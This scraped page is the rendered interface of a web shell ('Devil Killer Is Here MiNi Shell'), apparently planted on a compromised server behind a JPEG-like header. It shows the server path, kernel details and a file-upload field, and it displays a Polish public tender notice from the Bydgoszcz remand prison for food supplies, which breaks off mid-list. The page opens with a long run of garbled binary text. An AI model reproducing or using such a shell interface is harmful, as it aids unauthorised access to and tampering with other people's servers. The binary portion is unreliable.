JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250513/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250513/0022769201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy różnych artykułów spożywczych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ARESZT ŚLEDCZY W BYDGOSZCZY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Kwatermistrzowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 091393218</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wały Jagiellońskie 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-131</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">as_bydgoszcz@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy różnych artykułów spożywczych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5afe2afd-4824-4623-bd99-40d9eb91e4a8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00227692</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00117079/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Różne artykuły spożywcze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5afe2afd-4824-4623-bd99-40d9eb91e4a8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składnie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych <br/> w ustawie „Pzp”, odbywa się przy użyciu środków komunikacji elektronicznej, <br/> w postaci platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl i ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz za pomocą poczty elektronicznej: zp_as_bydgoszcz@sw.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu ,,Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce ,,Centrum Pomocy”. <br/>2. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>	a. w formatach określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>	b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści ,,Formularza do komunikacji”).<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert , odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce ,, Formularze” (,,Formularze do komunikacji”). Za pośrednictwem ,, Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk ,,dodaj załącznik”). W przypadku załączników, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie <br/> z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podpisem zewnętrznym lub wewnętrznym. <br/> W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ zewnętrzny).<br/>5. Możliwość korzystania w postępowaniu z ,,Formularzy do komunikacji” <br/> w pełnym zakresie wymaga posiadania konta ,,Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z ,,Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na platformie e-Zamówienia. <br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce ,,Komunikacja”.<br/>7. Maksymalny rozmiar plików przesłanych za pośrednictwem ,,Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce ,,Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.Kw.2232.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I - RÓŻNE ARTYKUŁY SPOŻYWCZE<br/>1	Bulion warzywny- koncentrat zupy w proszku, w postaci proszku lub granulek, pakowany w worki od 1 do 20 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy- 770 kg<br/>2	Cynamon - mielony, sypki, niezbrylony, w postaci proszku lub granulek, smak i zapach charakterystyczny pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy- 33 kg<br/>3	Czosnek granulowany -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -	132 kg<br/>4	Herbata granulowana-	smak i zapach charakterystyczny, w postaci granulek, pakowana w worki od 5 do 25 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy- 990 kg<br/>5	Koperek suszony	-smak i zapach charakterystyczny, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 132 kg<br/>6	Kwasek cytrynowy - smak i zapach charakterystyczny, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy- 66 kg<br/>7	Liść laurowy- suszony, niezmielony, w postaci liści, smak i zapach charakterystyczny, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -66 kg<br/>8	Majeranek- zapach charakterystyczny, w postaci suszonego i rozdrobnionego ziela, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 165 kg<br/>9	Majonez- konsystencja gładka, struktura nierozwarstwiona, kolor i smak charakterystyczny, zawartość tłuszczu 70-80%,pakowany w pojemniki plastikowe lub słoiki do 1 kg. Termin przydatności do spożycia minimum 3 miesiące od daty dostawy -132 kg<br/>10	Musztarda- konsystencja jednolita, produkt nie rozwarstwiający się; kolor, zapach i smak charakterystyczny; pakowany w opakowania od 0,5 do 1 kg, termin przydatności do spożycia minimum 3 miesiące od daty dostawy - 176 kg<br/>11	Ocet -smak i zapach charakterystyczny; przejrzysty, w opakowaniach od 0,5 do 5 L , termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 473 l<br/>12	Papryka suszona słodka- smak, zapach i barwa charakterystyczne, w postaci proszku, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 132 kg<br/>13	Pieprz naturalny -mielony. Smak, zapach i barwa charakterystyczne, w postaci proszku, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 396 kg<br/>14	Przyprawa płynna do zup typu maggi (w l) - konsystencja płynna, zbliżona w swoim smaku, konsystencji i ogólnym wyglądzie do sosu sojowego. Zabarwienie ciemnobrązowe, na bazie białka sojowego. Pakowana w opakowania o pojemności od 1 do 5 L - 770 L<br/>15	Przyprawa uniwersalna - mieszanka suszonych ziół, przypraw, suszonych warzyw (marchew, pasternak, cebula, seler, pietruszka) w postaci proszku lub granulek, bez grudek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 550 kg<br/>16	Sól	Niezbrylona, sypka -barwa typowa, bez zanieczyszczeń. Jodowana lub niejodowana. Opakowania od 1 do 25 kg. Termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 3190 kg<br/>17	Ziele angielskie -ziarna suszone, niezmielone. Zapach charakterystyczny, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 110 kg<br/>18	Zupa barszcz biały -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 154 kg<br/>19	Zupa barszcz czerwony	Smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 286 kg<br/>20	Zupa pieczarkowa -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 352 kg<br/>21	Zupa żurek -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -154 kg<br/>22	Zupa ogonowa - smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 770 kg<br/>23	Żelatyna -niezbrylona, sypka. Barwa typowa, bez zanieczyszczeń. Opakowania od 1 do 5 kg. Termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -22 kg<br/>24	Miód naturalny -niesztuczny, kolor i konsystencja charakterystyczne, opakowanie 25 g, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 11 kg<br/>25	Curry-smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 22 kg<br/>26	Oregano- zapach charakterystyczny, w postaci suszonego i rozdrobnionego ziela, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -88 kg<br/>27	Natka pietruszki suszona -smak i zapach charakterystyczny, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 33 kg<br/>28	Sos grzybowy -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -264 kg<br/>29	Sos myśliwski	-smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -22 kg<br/>30	Sos pieczeniowy -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -220 kg<br/>31	Sos boloński -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -1100 kg<br/>32	Sos pomidorowy -smak i zapach charakterystyczny, w postaci proszku lub granulek, pakowany w worki od 1 do 5 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 550 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II - CUKIER BIAŁY<br/>Cukier	Biały, kryształ - niezbrylowany, sypki. Bez zanieczyszczeń. pakowany w worki od 1 do 50 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy	- 4070 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III - PRODUKTY SOJOWE<br/>1	Flaki sojowe - teksturowane białko sojowe w postaci kostek rożnej wielkości, produkt suchy pakowany w worki od 5 do 25 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 374 kg<br/>2	Granulat sojowy -teksturowane białko sojowe w postaci granulatu, produkt suchy pakowany w worki od 5 do 25 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -660 kg<br/>3	Kostka sojowa -teksturowane białko sojowe w postaci kostek rożnej wielkości, produkt suchy pakowany w worki od 5 do 25 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 660 kg<br/>4	Kotlety sojowe<br/>(typu big steak) -teksturowane białko sojowe w postaci kotletów o wadze 30-40 g, produkt suchy pakowany w worki od 5 do 25 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 550 kg<br/>5	Pasztet sojowy -bez dodatków pochodzenia zwierzęcego, opakowanie typu alupak z tzw. zawleczką do otwierania, bez wad zamknięcia, niezdeformowane, waga 100 – 130 g, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 220 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV - PRODUKTY ZBOŻOWE<br/>1	Chrupki kukurydziane	Wygląd swoisty, barwa biała lub jasnożółta, niepokruszone, pakowane w worki od 0,100 do 1 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy. Produkt bezglutenowy.	15613310-4	kg	22<br/>2	Kasza jęczmienna - barwa jasnoszara, zapach i smak swoisty, zawartość ziaren połamanych oraz mączki nie więcej niż 1,5%, pakowany w worki od 5 do 50 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy	5940 kg<br/>3	Kasza manna -bez grudek, mąki i otrąb, barwa biała z odcieniem żółtawym, zapach i smak swoisty, bez zanieczyszczeń, pakowany w worki od 15 do 50 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy -2200 kg<br/>4	Kasza gryczana -prażona, barwa jasnobrązowa do brunatnej, zapach i smak swoisty, zawartość ziaren połamanych oraz mączki nie więcej niż 1,5%, pakowany w worki od 5 do 50 kg, termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 330 kg<br/>5	Mąka pszenna jasna, typ 450,500,550 bez grudek, barwa jednolita, biała z odcieniem żółtym, zapach i smak swoisty. Pakowana w worki od 15 do 50 kg, jasna typ 450, 500, 550. Termin przydatności do spożycia minimum 6 miesięcy od daty dostawy - 4400 kg<br/>6	Płatki kukurydziane - barwa właściwa dla produktu, zapach i smak swoisty, niepokruszone. Pakowane w worki od 1 do 20 kg, bez zawartości glutenu, termin przydatności do spożycia minimum 6 